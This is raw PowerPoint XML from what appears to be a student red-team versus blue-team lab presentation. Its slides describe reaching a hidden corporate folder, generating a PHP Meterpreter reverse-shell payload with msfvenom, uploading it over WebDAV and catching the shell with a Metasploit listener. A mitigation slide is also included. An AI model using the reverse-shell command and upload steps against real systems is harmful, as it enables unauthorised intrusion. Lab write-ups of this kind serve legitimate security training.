      <dsp:txXfrm>
        <a:off x="120798" y="142347"/>
        <a:ext cx="6340959" cy="2232954"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2625699"/>
          <a:ext cx="6582555" cy="24745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>
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Mitigation: Finding the Request for the Hidden Directory</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="120798" y="2746497"/>
        <a:ext cx="6340959" cy="22329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01:52:14.979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15505 21696 16383 0 0,'4'0'0'0'0,"7"0"0"0"0,5 0 0 0 0,5 0 0 0 0,3 0 0 0 0,2 0 0 0 0,1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1-5 0 0 0,1-1 0 0 0,-1 1 0 0 0,1 0 0 0 0,-1 2 0 0 0,0 1 0 0 0,1 1 0 0 0,-1 0 0 0 0,1 1 0 0 0,-1 0 0 0 0,1 1 0 0 0,-1-1 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,5 0 0 0 0,1 0 0 0 0,1 0 0 0 0,-2 0 0 0 0,-2 0 0 0 0,0 0 0 0 0,-2 0 0 0 0,0 0 0 0 0,0 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,-4 5 0 0 0,-1 1 0 0 0,-1 0 0 0 0,2-2 0 0 0,1-1 0 0 0,2 4 0 0 0,0 0 0 0 0,1-1 0 0 0,1-1 0 0 0,-1-2 0 0 0,1-1 0 0 0,0-2 0 0 0,-1 1 0 0 0,1-1 0 0 0,0-1 0 0 0,-1 1 0 0 0,1 0 0 0 0,-1-1 0 0 0,0 1 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-5-4 0 0 0,-2-2 0 0 0,1 0 0 0 0,1 1 0 0 0,1 2 0 0 0,1 1 0 0 0,2 1 0 0 0,0 1 0 0 0,0 0 0 0 0,1 0 0 0 0,0 0 0 0 0,-5-4 0 0 0,-1-2 0 0 0,-1 1 0 0 0,2 0 0 0 0,-3 2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01:52:19.208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21378 21643 16383 0 0,'5'0'0'0'0,"5"0"0"0"0,7 0 0 0 0,3 0 0 0 0,4 0 0 0 0,2 0 0 0 0,2 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,-4 4 0 0 0,-2 2 0 0 0,-1 0 0 0 0,2-1 0 0 0,1-2 0 0 0,2-1 0 0 0,0-1 0 0 0,1 0 0 0 0,1-1 0 0 0,-1-1 0 0 0,1 1 0 0 0,0 0 0 0 0,-1 0 0 0 0,1-1 0 0 0,-1 1 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,-4 0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01:52:19.689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25506 21616 16383 0 0,'4'0'0'0'0,"7"0"0"0"0,5 0 0 0 0,5 0 0 0 0,3 0 0 0 0,2 0 0 0 0,1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,0 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,-4 0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01:52:21.485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28601 21564 16383 0 0,'5'0'0'0'0,"5"0"0"0"0,7 0 0 0 0,3 0 0 0 0,4 0 0 0 0,3 0 0 0 0,0 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-2 0 0 0 0,1 0 0 0 0,0 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,4 0 0 0 0,1 0 0 0 0,0 0 0 0 0,-1 0 0 0 0,-1 0 0 0 0,-2 0 0 0 0,0 0 0 0 0,-1 0 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1 4 0 0 0,0 2 0 0 0,0 0 0 0 0,1-2 0 0 0,-1 0 0 0 0,1-2 0 0 0,-1-1 0 0 0,1-1 0 0 0,-1 0 0 0 0,0 0 0 0 0,1 0 0 0 0,-1-1 0 0 0,1 1 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-1 0 0 0 0,1 0 0 0 0,-5 4 0 0 0,-2 2 0 0 0,1 0 0 0 0,1-1 0 0 0,1-2 0 0 0,1-1 0 0 0,2-1 0 0 0,-5 0 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87DCD-B379-4E22-815D-580AF3DDF1AE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BB6B2-BE50-4477-85F1-B1C721E1A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462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BB6B2-BE50-4477-85F1-B1C721E1AF7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947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232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726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65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DC8C0-AE45-43E2-AA7C-470B0D3CD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862DD6-BA66-42B0-9071-AFF37124A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F9BEF-1E5E-4B4C-B25C-9F55A23EE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DC2C-9566-46C4-900F-8681076C38C7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4DC0F-0FCA-4487-8546-F0FFCF69E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C2493-6B09-4B63-841F-7B633E14A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87D8E-B526-4108-B59A-A5F69F84E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715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BA5DC-A1DD-4C76-AADB-BDD75224A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D541B-5E68-44B9-A70F-A7FBFBEDC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ABB11-AE8A-4009-BC51-01B404C3D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DC2C-9566-46C4-900F-8681076C38C7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5A4FA-1ABE-4169-9928-540500A2B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86E14-C0BC-4D71-BF52-67AB387F4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87D8E-B526-4108-B59A-A5F69F84E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753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32E0-332E-42C9-94E8-9143FFE36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402477-942F-4F89-A9A6-71C867AC7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8434E-4042-4D6F-A964-FF2790CDF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DC2C-9566-46C4-900F-8681076C38C7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59B9E-4963-4240-88D7-609E43177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8DB8A-C91D-4F62-B78E-CD54C3CAF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87D8E-B526-4108-B59A-A5F69F84E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573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E1BB9-6A95-449B-B389-929AFF9E4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3FB78-365C-4893-ABC6-EFA7DB53C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4409FC-853A-4376-848B-29FDE05D7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26D0EB-4AD5-43BD-8228-DA7228F90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DC2C-9566-46C4-900F-8681076C38C7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EFC8E3-EC23-4338-BF84-0FC507CE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4EB15-C0AB-4223-B6A0-70DF8228D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87D8E-B526-4108-B59A-A5F69F84E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810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56AD2-3C8E-43FF-BA71-375BCDE11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09EFC-60F0-4A79-9232-4EC8E5825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118222-4F5B-465F-BDDB-A159C262BB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0AF3E9-EA59-4389-94A6-FAB4B66778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50D64D-B04B-4FF1-8640-28C3BF5D62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75CEB9-9FFA-4BCC-8605-5728AF932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DC2C-9566-46C4-900F-8681076C38C7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00487E-C6B1-4D48-A8FA-FB4F094FD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70901B-20B0-4DCF-9935-1BA86EA70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87D8E-B526-4108-B59A-A5F69F84E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231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C01FA-A636-4926-8017-35FE4327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666688-B00D-41CE-A703-85328686D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DC2C-9566-46C4-900F-8681076C38C7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7B1FD0-F529-4B22-8488-318996A54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DAEAF8-FE99-427B-86B6-EB31D258B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87D8E-B526-4108-B59A-A5F69F84E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9780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025B1A-13DA-48F2-97CC-488F7E946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DC2C-9566-46C4-900F-8681076C38C7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F7DC2D-8B8D-46A1-A01D-D9957831A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ADB7A6-D229-4DC2-B002-C2814599B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87D8E-B526-4108-B59A-A5F69F84E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2314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107A8-7049-4190-A26A-D3E037DE9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C6A09-CDC8-484D-AF44-B7DCDA052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3AF16-E504-436A-B360-317555E32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256C2-AAA4-441F-8583-C6B57FB80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DC2C-9566-46C4-900F-8681076C38C7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1634A8-228F-4EC6-9514-37E06F0E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EF794A-4966-4680-806B-101619C8B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87D8E-B526-4108-B59A-A5F69F84E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27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029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EB1A-9536-4263-B5B1-91EA05F79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66176D-F07D-4E40-9D8B-47C9CB7FA4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086ACF-91E2-4E04-8D32-C413B2A5A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089C0-F26A-4B9E-BE39-2A1E2EBE4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DC2C-9566-46C4-900F-8681076C38C7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16BA4D-3621-4784-967A-36951DB69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55943-9EBC-45F1-87F3-AD3E295D1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87D8E-B526-4108-B59A-A5F69F84E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586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519AA-A018-489D-840A-DE0DBBED9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8F0ABB-03C0-4824-B94F-921442FC4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D7142-6AD5-404B-A892-4700786B5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DC2C-9566-46C4-900F-8681076C38C7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92476-42C0-46E7-96E6-5BBE52DE2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C9796-D2FE-41B7-BA0E-52B1B0D3D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87D8E-B526-4108-B59A-A5F69F84E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1590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0A6168-FFAD-4BFF-A0E0-D26D1707C8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14CF0C-C53E-41A1-97AA-5A4B1D343E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D546D-1AB9-4D4C-941E-5556853A1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DC2C-9566-46C4-900F-8681076C38C7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E3DE6-C9C7-43D6-A0C9-7F2C6CAA6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94E6F-86FD-488A-AE1A-FADA67E1B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87D8E-B526-4108-B59A-A5F69F84E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4848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with Text colorful">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="693AB7"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="A44273"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="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F482595-4C4F-475E-8095-FC4BA5F41F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33375" y="547687"/>
            <a:ext cx="5610225" cy="5762626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FDD6A5D-9EDC-48B1-89B2-11E454B63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48402" y="1490663"/>
            <a:ext cx="5610223" cy="4819650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A0883CEC-7BC4-4383-83C7-D1C819470D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48399" y="547687"/>
            <a:ext cx="5610225" cy="72866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bearbeiten--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32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58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48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515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99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21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55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29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855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93CB7B-C4DD-4D5A-82FD-1935EF47D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D990F-FFBC-44A9-8CF7-411911993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9D138-82A8-45A3-B30A-54E8E93A05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EDC2C-9566-46C4-900F-8681076C38C7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21997-4F53-45FD-BB48-B4BB80C8DE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C764A-EEA8-4AF1-AE05-2F7C186793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87D8E-B526-4108-B59A-A5F69F84E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423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8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9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://192.168.1.105/company_folders/secrets_folder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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle6.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout6.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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the-spike/hail-hydra-doing-neuroscience-without-a-brain-9b47ddd5df47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 descr="Red and blue abstract background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{133C0EFC-818D-A911-1BDE-06B74F4F9B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3111" r="1" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="37181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3E5443-8931-4016-D6E5-B40AE47C9E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  <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>RED VS BLUE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F20A04-AC59-FA1F-EE68-63BC9F8404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  <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>A CTRL-ALT-ELITE Production</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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7275516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49EAD-3881-FC8D-6BCD-3F596B6D7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1" y="218870"/>
            <a:ext cx="11691619" cy="1075357"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>Access the Secret Folder Directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Avenir Next LT Pro Light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4DDF576-7C96-495E-2C50-9E696A99224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01018040"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="220981" y="2054861"/>
          <a:ext cx="6388242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E1F20C3-D5A7-5920-D21C-C48E32D1AB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6731000" y="3112039"/>
            <a:ext cx="5181600" cy="137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450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102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4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DC1AFE-BEB6-1C52-9144-AD36ACDB1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Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>Access the Corporate Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Picture 9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73DB654-7C75-EF88-3655-2366DC9C5B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231" r="11024" b="-1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1F29EB-94D3-88E8-31C3-813D7E37E9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3504298"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7546848" y="2516777"/>
          <a:ext cx="3803904" cy="3660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061676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185F78-388D-3EE2-C489-369C7E2B2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>
            <a:norm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Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>Create the Custom Payload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74592-B0C7-39C6-8452-706953A5E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3822192" cy="3773010"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0" anchor="t"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700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>To create a reverse shell, we started by crafting the payload in the Desktop directory with the following command: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> LHOST=192.168.1.8 LPORT=4444 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reverse_tcp.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Avenir Next LT Pro"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Avenir Next LT Pro"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn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700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>After creating the payload, we uploaded the file directly to the corporate network through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t> connection.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700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>This demonstrates the file inclusion vulnerability, allowing file access directly to the web server. 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F1A90A43-3389-B045-5DC3-DA524E6D2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716" y="1504213"/>
            <a:ext cx="6596652" cy="36941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317385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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911BE883-46B4-412C-B6C3-88A2FF74B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EA52EB-C62F-1858-79FE-F4909B081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2944" y="629266"/>
            <a:ext cx="4639055" cy="1676603"/>
          </a:xfr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  <a:latin typeface="Avenir Next LT Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set the Listener</a:t>
            </a:r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211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436793CF-BED8-6F8E-B7BC-7E35B64B4DE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639" t="339" r="13410" b="1525"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="640830" y="777460"/>
            <a:ext cx="6284001" cy="5312286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D6953-0754-1EF0-392A-27EE4933A3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45753" y="2438401"/>
            <a:ext cx="3667036" cy="3862146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>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>In the command line, we opened Metasploit by running msfconsole.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>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>Within msfconsole, we set up the listener by setting the payload and the host as shown in the screenshot. Then we ran the exploit command to activate the listener.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>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>We then established the connection by navigating to the WebDAV page in the browser and clicking on the payload we created. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2663377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12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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912C5E87-CB8A-4EB6-9DF9-90164F54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3983755" y="404258"/>
            <a:ext cx="7775429" cy="6051730"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 6757888 w 7775429"/>
              <a:gd name="connsiteY0" fmla="*/ 3123835 h 6051730"/>
              <a:gd name="connsiteX1" fmla="*/ 5223007 w 7775429"/>
              <a:gd name="connsiteY1" fmla="*/ 3123835 h 6051730"/>
              <a:gd name="connsiteX2" fmla="*/ 5003739 w 7775429"/>
              <a:gd name="connsiteY2" fmla="*/ 3001951 h 6051730"/>
              <a:gd name="connsiteX3" fmla="*/ 4236300 w 7775429"/>
              <a:gd name="connsiteY3" fmla="*/ 1688315 h 6051730"/>
              <a:gd name="connsiteX4" fmla="*/ 4236300 w 7775429"/>
              <a:gd name="connsiteY4" fmla="*/ 1435519 h 6051730"/>
              <a:gd name="connsiteX5" fmla="*/ 5003739 w 7775429"/>
              <a:gd name="connsiteY5" fmla="*/ 121884 h 6051730"/>
              <a:gd name="connsiteX6" fmla="*/ 5223007 w 7775429"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 6051730"/>
              <a:gd name="connsiteX7" fmla="*/ 6757888 w 7775429"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 6051730"/>
              <a:gd name="connsiteX8" fmla="*/ 6977155 w 7775429"/>
              <a:gd name="connsiteY8" fmla="*/ 121884 h 6051730"/>
              <a:gd name="connsiteX9" fmla="*/ 7744595 w 7775429"/>
              <a:gd name="connsiteY9" fmla="*/ 1435519 h 6051730"/>
              <a:gd name="connsiteX10" fmla="*/ 7744595 w 7775429"/>
              <a:gd name="connsiteY10" fmla="*/ 1688315 h 6051730"/>
              <a:gd name="connsiteX11" fmla="*/ 6977155 w 7775429"/>
              <a:gd name="connsiteY11" fmla="*/ 3001951 h 6051730"/>
              <a:gd name="connsiteX12" fmla="*/ 6757888 w 7775429"/>
              <a:gd name="connsiteY12" fmla="*/ 3123835 h 6051730"/>
              <a:gd name="connsiteX13" fmla="*/ 3556238 w 7775429"/>
              <a:gd name="connsiteY13" fmla="*/ 5503115 h 6051730"/>
              <a:gd name="connsiteX14" fmla="*/ 3291436 w 7775429"/>
              <a:gd name="connsiteY14" fmla="*/ 5503115 h 6051730"/>
              <a:gd name="connsiteX15" fmla="*/ 3260544 w 7775429"/>
              <a:gd name="connsiteY15" fmla="*/ 5503115 h 6051730"/>
              <a:gd name="connsiteX16" fmla="*/ 3231067 w 7775429"/>
              <a:gd name="connsiteY16" fmla="*/ 5452355 h 6051730"/>
              <a:gd name="connsiteX17" fmla="*/ 3086688 w 7775429"/>
              <a:gd name="connsiteY17" fmla="*/ 5203722 h 6051730"/>
              <a:gd name="connsiteX18" fmla="*/ 3086688 w 7775429"/>
              <a:gd name="connsiteY18" fmla="*/ 5064553 h 6051730"/>
              <a:gd name="connsiteX19" fmla="*/ 3481893 w 7775429"/>
              <a:gd name="connsiteY19" fmla="*/ 4383983 h 6051730"/>
              <a:gd name="connsiteX20" fmla="*/ 3602840 w 7775429"/>
              <a:gd name="connsiteY20" fmla="*/ 4312701 h 6051730"/>
              <a:gd name="connsiteX21" fmla="*/ 4391548 w 7775429"/>
              <a:gd name="connsiteY21" fmla="*/ 4312701 h 6051730"/>
              <a:gd name="connsiteX22" fmla="*/ 4428679 w 7775429"/>
              <a:gd name="connsiteY22" fmla="*/ 4317633 h 6051730"/>
              <a:gd name="connsiteX23" fmla="*/ 4454216 w 7775429"/>
              <a:gd name="connsiteY23" fmla="*/ 4328340 h 6051730"/>
              <a:gd name="connsiteX24" fmla="*/ 4438609 w 7775429"/>
              <a:gd name="connsiteY24" fmla="*/ 4355333 h 6051730"/>
              <a:gd name="connsiteX25" fmla="*/ 3885668 w 7775429"/>
              <a:gd name="connsiteY25" fmla="*/ 5311656 h 6051730"/>
              <a:gd name="connsiteX26" fmla="*/ 3556238 w 7775429"/>
              <a:gd name="connsiteY26" fmla="*/ 5503115 h 6051730"/>
              <a:gd name="connsiteX27" fmla="*/ 4438254 w 7775429"/>
              <a:gd name="connsiteY27" fmla="*/ 6051730 h 6051730"/>
              <a:gd name="connsiteX28" fmla="*/ 3548595 w 7775429"/>
              <a:gd name="connsiteY28" fmla="*/ 6051730 h 6051730"/>
              <a:gd name="connsiteX29" fmla="*/ 3412169 w 7775429"/>
              <a:gd name="connsiteY29" fmla="*/ 5971324 h 6051730"/>
              <a:gd name="connsiteX30" fmla="*/ 3173058 w 7775429"/>
              <a:gd name="connsiteY30" fmla="*/ 5559560 h 6051730"/>
              <a:gd name="connsiteX31" fmla="*/ 3146046 w 7775429"/>
              <a:gd name="connsiteY31" fmla="*/ 5513043 h 6051730"/>
              <a:gd name="connsiteX32" fmla="*/ 3167300 w 7775429"/>
              <a:gd name="connsiteY32" fmla="*/ 5513043 h 6051730"/>
              <a:gd name="connsiteX33" fmla="*/ 3267756 w 7775429"/>
              <a:gd name="connsiteY33" fmla="*/ 5513043 h 6051730"/>
              <a:gd name="connsiteX34" fmla="*/ 3311396 w 7775429"/>
              <a:gd name="connsiteY34" fmla="*/ 5588194 h 6051730"/>
              <a:gd name="connsiteX35" fmla="*/ 3478124 w 7775429"/>
              <a:gd name="connsiteY35" fmla="*/ 5875309 h 6051730"/>
              <a:gd name="connsiteX36" fmla="*/ 3599071 w 7775429"/>
              <a:gd name="connsiteY36" fmla="*/ 5946592 h 6051730"/>
